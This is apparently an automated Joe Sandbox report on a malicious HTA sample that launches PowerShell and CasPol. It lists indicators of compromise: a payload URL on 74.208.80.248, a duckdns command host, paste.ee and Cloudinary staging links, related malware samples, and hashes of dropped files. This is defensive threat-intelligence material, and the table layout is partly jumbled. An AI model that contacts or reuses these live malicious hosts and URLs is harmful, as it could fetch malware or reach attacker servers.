http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000008.00000002.2485897465.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000003.00000002.2229203641.0000000004E5A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com; | powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://analytics.paste.ee | powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://go.micros | powershell.exe, 00000003.00000002.2229203641.0000000004E5A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gp | CasPol.exe | false | | high
https://www.google.com | powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://res.cloudinary.com | powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFo | powershell.exe, 00000003.00000002.2233063416.0000000007145000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp/C | powershell.exe, 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp; CasPol.exe, 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore6lB | powershell.exe, 00000003.00000002.2229203641.0000000004871000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000008.00000002.2487827556.00000000047B1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpgt | powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFity | powershell.exe, 00000003.00000002.2235184005.0000000007FDA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000003.00000002.2229203641.00000000049C7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.2231208292.00000000058D9000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://analytics.paste.ee; | powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://74.208.80.248/43/seewhati | powershell.exe, 00000003.00000002.2229203641.0000000004C97000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFc | powershell.exe, 00000003.00000002.2233063416.0000000007145000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdnjs.cloudflare.com | powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdnjs.cloudflare.com; | powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000003.00000002.2229203641.0000000004871000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000008.00000002.2487827556.00000000047B1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://secure.gravatar.com | powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://themes.googleusercontent.com | powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFY | powershell.exe, 00000003.00000002.2233063416.0000000007145000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://akaStorageSetting.cdxml | powershell.exe, 00000003.00000002.2233063416.00000000070B2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/dahall/taskscheduler | powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmp | false | | high
IPs

IP | Domain | Country | ASN | ASN Name | Malicious
151.101.1.137 | cloudinary.map.fastly.net | United States | 54113 | FASTLYUS | false
104.21.84.67 | paste.ee | United States | 13335 | CLOUDFLARENETUS | false
192.169.69.26 | kiolokgangan.duckdns.org | United States | 23033 | WOWUS | true
74.208.80.248 | unknown | United States | 8560 | ONEANDONE-AS Brauerstrasse 48 DE | true
                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1576455
                                                                                    Start date and time:2024-12-17 07:21:07 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 8m 57s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:13
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta
                                                                                    Detection:MAL
                                                                                    Classification:mal100.rans.phis.troj.spyw.expl.evad.winHTA@18/16@5/4
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 75%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 99%
                                                                                    • Number of executed functions: 59
                                                                                    • Number of non-executed functions: 184
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .hta
                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target mshta.exe, PID 3608 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:21:58 | API Interceptor | 121x Sleep call for process: powershell.exe modified
01:23:10 | API Interceptor | 3736783x Sleep call for process: CasPol.exe modified
Joe Sandbox View / Context: other analyses sharing this sample's IPs and domains (all listed analyses were detected as malicious; the report's hash and link columns are omitted)

Match | Associated Sample Name / URL | Detection | Threat Name | Context
151.101.1.137 | createdbetterthingswithgreatnressgivenmebackwithnice.hta | malicious | Cobalt Strike, FormBook |
151.101.1.137 | greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta | malicious | Cobalt Strike, Remcos |
151.101.1.137 | goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta | malicious | Cobalt Strike, FormBook |
151.101.1.137 | creamkissingthingswithcreambananapackagecreamy.hta | malicious | Cobalt Strike, Remcos |
151.101.1.137 | Euro confirmation Sp.xls | malicious | Unknown |
151.101.1.137 | stage2.ps1 | malicious | PureLog Stealer, RevengeRAT, zgRAT |
151.101.1.137 | nicegirlforyou.hta | malicious | Cobalt Strike, Remcos |
151.101.1.137 | Invoice A037.xls | malicious | Unknown |
151.101.1.137 | Orden_de_Compra_Nmero_6782929219.xls | malicious | HTMLPhisher |
151.101.1.137 | Aktarma,pdf.vbs | malicious | Remcos |
104.21.84.67 | Order_DEC2024.wsf | malicious | Remcos | paste.ee/d/GXRLA
104.21.84.67 | nr101612_Order.wsf | malicious | Remcos | paste.ee/d/81FCf
104.21.84.67 | Doc261124.vbs | malicious | Snake Keylogger, VIP Keylogger | paste.ee/d/MQJcS
104.21.84.67 | Chitanta bancara - #113243.xlam.xlsx | malicious | AgentTesla | paste.ee/d/u4bvR
104.21.84.67 | rdevuelto_Pagos.wsf | malicious | AgentTesla | paste.ee/d/SDfNF
104.21.84.67 | Product list 0980DF098A7.xls | malicious | Unknown | paste.ee/d/enGXm
104.21.84.67 | Payment_advice.vbs | malicious | Unknown | paste.ee/d/wXm0Y
104.21.84.67 | SHREE GANESH BOOK SERVICES-347274.xls | malicious | Unknown | paste.ee/d/eA3FM
104.21.84.67 | dereac.vbe | malicious | Unknown | paste.ee/d/JZHbW
104.21.84.67 | P018400.xla.xlsx | malicious | Unknown | paste.ee/d/kmRFs
192.169.69.26 | f5ATZ1i5CU.exe | malicious | RedLine, XWorm | duclog23.duckdns.org:37552/
192.169.69.26 | SX8OLQP63C.exe | malicious | VjW0rm, AsyncRAT, RATDispenser | yuya0415.duckdns.org:1928/Vre
192.169.69.26 | confirmación y corrección de la dirección de entrega.vbs | malicious | Unknown | servidorarquivos.duckdns.org/e/e
192.169.69.26 | oKtkBYZMWl.exe | malicious | Unknown | csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
192.169.69.26 | oKtkBYZMWl.exe (second analysis) | malicious | Unknown | csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
192.169.69.26 | http://yvtplhuqem.duckdns.org/ja/ | malicious | Unknown | yvtplhuqem.duckdns.org/ja/
192.169.69.26 | http://fqqqffcydg.duckdns.org/en/ | malicious | Unknown | fqqqffcydg.duckdns.org/en/
192.169.69.26 | http://yugdzvsqnf.duckdns.org/en/ | malicious | Unknown | yugdzvsqnf.duckdns.org/en/
192.169.69.26 | &nuevo_pedido#..vbs | malicious | Unknown | servidorarquivos.duckdns.org/e/e
192.169.69.26 | transferencia_Hsbc.xlsx | malicious | Unknown | servidorarquivos.duckdns.org/e/e
cloudinary.map.fastly.net | createdbetterthingswithgreatnressgivenmebackwithnice.hta | malicious | Cobalt Strike, FormBook |
                                                                                                        • 151.101.1.137
                                                                                                        PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                                        • 151.101.193.137
                                                                                                        NB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.193.137
                                                                                                        greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                        • 151.101.1.137
                                                                                                        goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                        • 151.101.1.137
                                                                                                        creamkissingthingswithcreambananapackagecreamy.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                        • 151.101.1.137
                                                                                                        Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                                                        • 151.101.129.137
                                                                                                        Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.1.137
                                                                                                        stage2.ps1Get hashmaliciousPureLog Stealer, RevengeRAT, zgRATBrowse
                                                                                                        • 151.101.193.137
                                                                                                        nicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                        • 151.101.1.137
                                                                                                        paste.eecreatedbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                        • 104.21.84.67
                                                                                                        givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                        • 104.21.84.67
                                                                                                        clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                        • 172.67.187.200
                                                                                                        PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                                        • 104.21.84.67
                                                                                                        NB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • 188.114.96.6
                                                                                                        greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                        • 104.21.84.67
                                                                                                        goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                        • 172.67.187.200
                                                                                                        creamkissingthingswithcreambananapackagecreamy.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                        • 104.21.84.67
                                                                                                        Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                                                        • 188.114.97.6
                                                                                                        SOA USD67,353.35.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                        • 188.114.97.6
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        FASTLYUScreatedbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                        • 151.101.1.137
                                                                                                        ORDER-24171200967.XLS..jsGet hashmaliciousWSHRat, Caesium Obfuscator, STRRATBrowse
                                                                                                        • 199.232.196.209
                                                                                                        https://ivsmn.kidsavancados.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 151.101.131.6
                                                                                                        https://uvcr.ovactanag.ru/jQXv/Get hashmaliciousUnknownBrowse
                                                                                                        • 151.101.130.137
                                                                                                        https://dot.itsecuritymessages.com/45sf4657dvz4hn/afc6c7/00179cbf-581d-4c00-98d3-bf1104b204adGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.2.109
                                                                                                        https://link.mail.beehiiv.com/ls/click?upn=u001.8ULyQR0JYqJFmtAcEKOwZJrtx6Pg-2FFIdL75Xr8cQplPy1BwMP6K04UCj8Y6BqsqIO5QCbkskm97LegF2duW8h-2B7y0wF2E-2BDZNcbzCPIVszT1GD6EOVy0YRZV55MI3rlD0kPZAiaJ0IK1-2FMU2lgPk2Kii32mX86fkDuIDK9GPx4-2FfuyI6JAqdMrtQqIbvs2W-2FN4SKHyAe889o909j2BgEQTYHmZASxysFG5X1abiH-2Bc9UXRQ1Ein-2BS-2BlY0g6W3s6a-2Bg8fspAfccvSCNZ8UZez1w-3D-3DUR2i_K8Qrv2qBC50DA374Af0scmFKIlSM-2Bv5ewezTCdQ-2FHdeUjmHtY3NrJD1TBTC8B4zB5HyIT-2F4sQexLT4eDcDNpHTw1Uv6zyerCF2l6Qv2QnUXIFi1vgFIVZbyXm-2Fb4OHwN5YbpoyTJNqIBeZHgSrlo7M6ZizbyF9nigOzGQDcMUgYHM7Aiblgmi6ZZqeS-2F4eQTcSMrquYcXkgDnpAgjrAXvqys7q9tGDujdSY7rWu7e2v-2B8ZqylkvKbnTnsoe7xpWX2CCdK7-2Ffs69cITr47FLMcG63ztEATsgzr65zgaz1vTU66UCHiyx70Gk8JDD2YjXZuzQvmiRgDA-2FXjbWgjk3i1v2Ulq6y1yKgmK1yrN5XfmHVDLnIEf-2BjigPUThjsOSZZpY0Q2K61IDWrFAR0MbUNzwiY-2FVg-2BeuZ5GmE7khj3oFCj0ivt137LdIBat61ZEFDpGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.194.137
                                                                                                        https://afg.acemlnb.com/lt.php?x=3TZy~GE3UnGZEpJA-w9HgOSc2K2ji_L0wu1gjqXGIXSh587-zEy.zuJr1Y2iitE~judAXHPHJeTMHaWtOdxFVOFx23MoiNDGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.129.140
                                                                                                        https://nq.trikeunpured.com/iSH5pdvbnvr/kmgeLGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.129.74
                                                                                                        Tbconsulting Company Guidelines Employee Handbook.docxGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.120.157
                                                                                                        FINAL000035745873695487KHFKA.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 151.101.194.137
                                                                                                        WOWUSsweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                        • 192.169.69.26
                                                                                                        1734388385543fca13ccf5614dc71c1922a5cd8cddeb80fc9e4bce55f618d2232c3744cd06117.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 192.169.69.26
                                                                                                        x295IO8kqM.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 192.169.69.26
                                                                                                        zvXPSu3dK5.exeGet hashmaliciousAsyncRATBrowse
                                                                                                        • 192.169.69.26
                                                                                                        173398584769f9c5bcf28a71f77fba1335e77fe6b4cc4f05afc05fdd9f5830429be0bc9fb5758.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 192.169.69.26
                                                                                                        nicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                        • 192.169.69.26
                                                                                                        1733858044e64c59622ab494dda2ff98fce76991f7e15e513d6a3620e7f58ad7cc67d3889c571.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                        • 192.169.69.26
                                                                                                        f5ATZ1i5CU.exeGet hashmaliciousRedLine, XWormBrowse
                                                                                                        • 192.169.69.26
                                                                                                        P0J8k3LhVV.exeGet hashmaliciousNanocoreBrowse
                                                                                                        • 192.169.69.26
                                                                                                        173349055645d097cf36f6a7cc8cd8874001209539b453cb16f6acd61c0d845ab62e19e89d339.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                                                                        • 192.169.69.26
                                                                                                        ONEANDONE-ASBrauerstrasse48DEBG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • 74.208.80.248
                                                                                                        BG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • 74.208.80.248
                                                                                                        BG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • 74.208.80.248
                                                                                                        profroma invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 74.208.236.156
                                                                                                        ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 77.68.64.45
                                                                                                        SC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 217.160.0.60
                                                                                                        loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 217.76.147.12
                                                                                                        jew.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 87.106.218.105
                                                                                                        RFQ_P.O.1212024.scrGet hashmaliciousFormBookBrowse
                                                                                                        • 217.160.0.200
                                                                                                        01152-11-12-24.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 217.160.0.113
                                                                                                        CLOUDFLARENETUScreatedbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                        • 104.21.84.67
                                                                                                        ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                        • 172.65.156.157
                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                        • 104.21.2.110
                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                        • 172.67.129.27
                                                                                                        PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        • 188.114.97.3
                                                                                                        https://tinyurl.com/5faazntxGet hashmaliciousUnknownBrowse
                                                                                                        • 104.18.111.161
                                                                                                        https://solve.jenj.org/awjxs.captcha?u=001e7d38-a1fc-47e3-ac88-6df0872bfe2dGet hashmaliciousUnknownBrowse
                                                                                                        • 104.21.16.207
                                                                                                        gkcQYEdJSO.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                        • 104.21.38.84
                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                        • 104.21.2.110
                                                                                                        https://ivsmn.kidsavancados.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 104.18.94.41
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        3b5074b1b5d032e5620f69f9f700ff0esweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                        • 104.21.84.67
                                                                                                        • 151.101.1.137
                                                                                                        createdbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                        • 104.21.84.67
                                                                                                        • 151.101.1.137
                                                                                                        PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        • 104.21.84.67
                                                                                                        • 151.101.1.137
                                                                                                        drivers.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 104.21.84.67
                                                                                                        • 151.101.1.137
                                                                                                        GameBoxMini.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 104.21.84.67
                                                                                                        • 151.101.1.137
                                                                                                        drivers.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 104.21.84.67
                                                                                                        • 151.101.1.137
                                                                                                        Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 104.21.84.67
                                                                                                        • 151.101.1.137
                                                                                                        https://docsend.com/v/ty7vw/up-dateGet hashmaliciousUnknownBrowse
                                                                                                        • 104.21.84.67
                                                                                                        • 151.101.1.137
                                                                                                        3gJQoqWpxb.batGet hashmaliciousUnknownBrowse
                                                                                                        • 104.21.84.67
                                                                                                        • 151.101.1.137
                                                                                                        uZgbejeJkT.batGet hashmaliciousUnknownBrowse
                                                                                                        • 104.21.84.67
                                                                                                        • 151.101.1.137
                                                                                                        No context
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: Unicode text, UTF-16, little-endian text, with very long lines (3281), with CRLF line terminators
Category: dropped
Size (bytes): 154104
Entropy (8bit): 3.8082312070089706
Encrypted: false
SSDEEP: 3072:qPN5KVAyQa3DsbfgpYcPN5KVAyQa3DsbfgpYNPN5KVAyQa3DsbfgpYf:25YYgpj5YYgpY5YYgpm
MD5: 80C468CCCBC1D6AA31D066F64CE06B42
SHA1: 6276DA318E9EC1756DDA7D7C9E9B2C5F00D3FDA4
SHA-256: 79A186BD409CAF82E85361C6885FD71EE00BEA6968D85CB8C9B71535909FE411
SHA-512: 37FD56E6121926E15433636AFE449F7002DE7A5BE35C18F8855D2E24C3542EABD7533B2DDB363E49972DDCA03F3EDB5868BB944AC799FF2FCF245D6271BF6662
Malicious: false

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 5829
Entropy (8bit): 4.901113710259376
Encrypted: false
SSDEEP: 96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
MD5: 7827E04B3ECD71FB3BD7BEEE4CA52CE8
SHA1: 22813AF893013D1CCCACC305523301BB90FF88D9
SHA-256: 5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
SHA-512: D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
Malicious: false

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 1144
Entropy (8bit): 5.290848674040258
Encrypted: false
SSDEEP: 24:32gSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKM9r8Hd:GgSU4y4RQmFoUeWmfmZ9tK8NF9u
MD5: 374272AB01A3AD6B586FC209D47F884D
SHA1: 8C785EB3C085C24C140A197D553DE29B3AF5628A
SHA-256: FEEC1C388B6D48779BD53FDC17D19CCFBABF759B59C84DAC3DA1B6D3D1376981
SHA-512: 4266E69AA211B66EC5E5BF649C75D9D136B735B41FDEC089EA61919DC3E93A2FC7A4B274A313234AE813F0DA7DA16EB3236039C77A7A66DC00AFFE26990790B3
Malicious: false
                                                                                                        Preview:@...e...........................................................@...............(..o...B.Rb&............Microsoft.VisualBasic...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...
                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Tue Dec 17 07:25:12 2024, 1st section name ".debug$S"
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1340
                                                                                                        Entropy (8bit):3.979239787661473
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:HTK9oca5qiUaHOwKcjmfwI+ycuZhNCakSKPNnqSed:zZfxNK2mo1ulCa3mqS+
                                                                                                        MD5:839563DDADA6B424E6C4D390254AEBE0
                                                                                                        SHA1:6E296545B710B796958FA54EBC057EC2D3309D9E
                                                                                                        SHA-256:CD7486159B98A0E288BF2E1D634C1D42C10C5E1AA94544DF55C0051BDD7D285E
                                                                                                        SHA-512:0983C635AC5D11CA8B8363E911E94243AC3FED9F4AD239ACCE5A69A06C6629E59E310AB5E49C3CEFF1FEA41A883EEC9C10CB3AB6CD3002E727F9990C6A7A2A47
                                                                                                        Malicious:false
                                                                                                        Preview:L...X'ag.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........V....c:\Users\user\AppData\Local\Temp\bxb5o0my\CSC331954E1B244EC883461F7D54BF3FA4.TMP..................K...:/...5.>a7..........7.......C:\Users\user\AppData\Local\Temp\RES207F.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.x.b.5.o.0.m.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
